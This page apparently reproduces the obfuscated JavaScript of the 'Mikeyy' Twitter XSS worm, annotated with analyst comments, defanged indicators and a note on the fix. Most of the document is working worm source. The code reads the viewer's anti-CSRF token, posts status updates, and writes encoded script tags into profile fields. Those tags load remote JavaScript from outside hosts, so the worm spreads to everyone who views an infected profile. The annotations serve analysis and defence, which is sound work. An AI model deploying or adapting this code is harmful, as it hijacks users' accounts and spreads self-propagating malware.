Cute obfuscation
// String table for the obfuscated script below: every property name, URL path,
// form fragment and message the code uses is looked up in this array by hex index
// (for example _0xc26a[0x6] is "open" and _0xc26a[0x30] is "/status/update").
// NOTE(review): as rendered on this page, entries 0x2d-0x2f contain unescaped double
// quotes and the last entry ends in `""`, so this line does not parse as shown.
// Presumably the original escaped those characters; the indices used by the code
// below are consistent with counting each of those three strings as one entry.
// Entries 0x2d-0x2f are the propagating markup: each begins with `"></a>` and then
// document.write()s a percent-encoded <script src=...> tag. Decoded and defanged,
// the three script sources are (usable as indicators in proxy/web-log searches):
//   hxxp://content.ireel[.]com/jsxss.js
//   hxxp://content.ireel[.]com/xssjs.js
//   hxxp://bambamyo.110mb[.]com/wompwomp.js
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
// XHConn: small XMLHttpRequest wrapper used by wait() to send same-origin requests
// from the viewer's browser session. Returns null when no XHR object can be created;
// otherwise exposes one method, this["connect"](url, method, vars, callback).
// Analyst view: every request built here is sent by the page that hosts the script,
// so it is sent in the context of whoever is viewing that page.
function XHConn(){
// _0x6687x2 = the XHR object, _0x6687x3 = "completion already reported" flag.
var _0x6687x2,_0x6687x3=false;
// Fallback chain: ActiveXObject("Msxml2.XMLHTTP"), then ActiveXObject("Microsoft.XMLHTTP"),
// then the native XMLHttpRequest constructor.
try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
catch(e) { _0x6687x2=false; }; }; };
if (!_0x6687x2) { return null; } ;
// connect(url, method, vars, callback): _0x6687x4 = URL, _0x6687x5 = HTTP method,
// _0x6687x6 = urlencoded body / query string, _0x6687x7 = completion callback.
// Returns true once send() has been called, false if anything in the try block throws.
this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
if (!_0x6687x2) { return false; };
_0x6687x3=false;
// Normalise the method with toUpperCase() before comparing it to "GET".
_0x6687x5=_0x6687x5[_0xc26a[0x3]]();
try {
if(_0x6687x5==_0xc26a[0x4]) {
// GET: open(method, url + "?" + vars, async=true), then clear the body.
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4+_0xc26a[0x5]+_0x6687x6,true);
_0x6687x6=_0xc26a[0x7];
} else {
// Any other method: open(method, url, async=true), then set a header literally named
// "Method" with the value "POST " + url + " HTTP/1.1", and a form-encoded Content-Type.
// That non-standard "Method" request header is a visible trait of traffic from this wrapper.
_0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4,true);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0x8],_0xc26a[0x9]+_0x6687x4+_0xc26a[0xa]);
_0x6687x2[_0xc26a[0xb]](_0xc26a[0xc],_0xc26a[0xd]);
} ;
// onreadystatechange: when readyState reaches 4, invoke the callback once with the XHR.
_0x6687x2[_0xc26a[0xe]]=function () {
if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
_0x6687x3=true;
_0x6687x7(_0x6687x2);
} ;
} ;
// send(vars): the body for non-GET requests, the empty string for GET.
_0x6687x2[_0xc26a[0x10]](_0x6687x6);
} catch(z) {
// Any exception while opening or sending is swallowed and reported as false.
return false;
} ;
return true;
} ;
return this;
} ;
// urlencode: form-style URL encoder. Applies encodeURIComponent, additionally
// percent-encodes ' ( ) * ~ !, turns "%20" into "+", and upper-cases the hex digits
// of every %xx escape. wait() uses it on the status text and on the markup payload
// before placing them in POST bodies.
function urlencode(_0x6687x9) {
// _0x6687xa = replacement map (search string -> replacement); _0x6687xb is unused here.
var _0x6687xa={},_0x6687xb=[];
var _0x6687xc=_0x6687x9.toString();
// Helper: replace every occurrence of _0x6687xe in _0x6687x9 with _0x6687xf
// by split(search) followed by join(replacement).
var _0x6687xd=function (_0x6687xe,_0x6687xf,_0x6687x9) {
var _0x6687xb=[];
_0x6687xb=_0x6687x9[_0xc26a[0x11]](_0x6687xe);
return _0x6687xb[_0xc26a[0x12]](_0x6687xf);
} ;
// Map entries, in order: "'"->"%27", "("->"%28", ")"->"%29", "*"->"%2A",
// "~"->"%7E", "!"->"%21", "%20"->"+".
_0x6687xa[_0xc26a[0x13]]=_0xc26a[0x14];
_0x6687xa[_0xc26a[0x15]]=_0xc26a[0x16];
_0x6687xa[_0xc26a[0x17]]=_0xc26a[0x18];
_0x6687xa[_0xc26a[0x19]]=_0xc26a[0x1a];
_0x6687xa[_0xc26a[0x1b]]=_0xc26a[0x1c];
_0x6687xa[_0xc26a[0x1d]]=_0xc26a[0x1e];
_0x6687xa[_0xc26a[0x1f]]=_0xc26a[0x20];
_0x6687xc=encodeURIComponent(_0x6687xc);
// NOTE(review): `search` and `replace` are assigned without var/let, so they become
// implicit globals on the hosting page.
for (search in _0x6687xa) {
replace=_0x6687xa[search];
_0x6687xc=_0x6687xd(search,replace,_0x6687xc);
} ;
// Rewrite each %xx escape as "%" + the two hex digits upper-cased.
return _0x6687xc[_0xc26a[0x22]](/(\%([a-z0-9]{2}))/g,function (_0x6687x10,_0x6687x11,_0x6687x12) {
return _0xc26a[0x21]+_0x6687x12[_0xc26a[0x3]]();
} );
// Unreachable: the function has already returned on the statement above.
return _0x6687xc;
} ;
// wait: the worm's action routine. It reads the anti-CSRF token out of the current
// page, then issues seven state-changing POSTs through XHConn: one status update and
// three pairs of profile changes that store the markup payload in profile fields.
// Analyst notes:
//  - The token is taken from the page's own HTML, so a per-session form token does not
//    stop requests made by script that is already running in the page.
//  - The payload strings begin with `"></a>`; presumably this closes an attribute and
//    an anchor where the stored field is rendered — the rendering side is not shown here.
//    If so, the fix is context-aware output encoding of those profile fields.
//  - Observable traits: a burst of POSTs to /status/update, /account/settings and
//    /account/profile_settings, a display name starting with "Womp", and status text
//    drawn from the four "Mikeyy" messages in the string table.
function wait() {
// Serialise the whole document: document["documentElement"]["innerHTML"].
var _0x6687x14=document[_0xc26a[0x24]][_0xc26a[0x23]];
// Capture the value assigned to twttr.form_authenticity_token in an inline script.
// `authreg` is assigned without var, so it becomes an implicit global.
authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var _0x6687x15=authreg[_0xc26a[0x25]](_0x6687x14);
// exec() returns null when the pattern is absent, in which case this line throws
// and none of the requests below are sent.
_0x6687x15=_0x6687x15[0x1];
// Four candidate status messages (string-table entries 0x26-0x29).
var _0x6687x16= new Array();
_0x6687x16[0x0]=_0xc26a[0x26];
_0x6687x16[0x1]=_0xc26a[0x27];
_0x6687x16[0x2]=_0xc26a[0x28];
_0x6687x16[0x3]=_0xc26a[0x29];
// Pick one uniformly: Math.floor(Math.random() * length).
var _0x6687x17=_0x6687x16[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x16[_0xc26a[0x2b]])];
var _0x6687x18=urlencode(_0x6687x17);
// Three candidate markup payloads (entries 0x2d-0x2f), each loading a remote script.
var _0x6687x19= new Array();
_0x6687x19[0x0]=_0xc26a[0x2d];
_0x6687x19[0x1]=_0xc26a[0x2e];
_0x6687x19[0x2]=_0xc26a[0x2f];
var _0x6687x1a=_0x6687x19[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x19[_0xc26a[0x2b]])];
var _0x6687x1b=urlencode(_0x6687x1a);
// Request 1: POST /status/update with authenticity_token=<token>&status=<message>
// &return_rendered_status=true&twttr=true. No callback argument is passed to connect()
// here or in any call below.
var _0x6687x1c= new XHConn();
_0x6687x1c[_0xc26a[0x2]](_0xc26a[0x30],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x33]+_0x6687x18+_0xc26a[0x34]);
// Request 2: POST /account/settings setting user[name] to the "Womp+...!" string and
// user[url] to the encoded payload.
var _0x6687x1d= new XHConn();
_0x6687x1d[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
// Request 3: POST /account/profile_settings placing the encoded payload in
// user[profile_link_color].
var _0x6687x1e= new XHConn();
_0x6687x1e[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
// Requests 4-7 repeat requests 2 and 3 twice more with identical arguments.
var _0x6687x1f= new XHConn();
_0x6687x1f[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
var _0x6687x20= new XHConn();
_0x6687x20[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
var _0x6687x21= new XHConn();
_0x6687x21[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
var _0x6687x22= new XHConn();
_0x6687x22[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
} ;
// Entry point: schedules the string "wait()" (string-table entry 0x3b) to be evaluated
// after 0xdac = 3500 ms. This is the string form of setTimeout, so the argument is
// compiled as code when the timer fires; a Content-Security-Policy without
// 'unsafe-eval' blocks this form in browsers that enforce it.
setTimeout(_0xc26a[0x3b],0xdac);
RE: Another Ajax powered XSS worm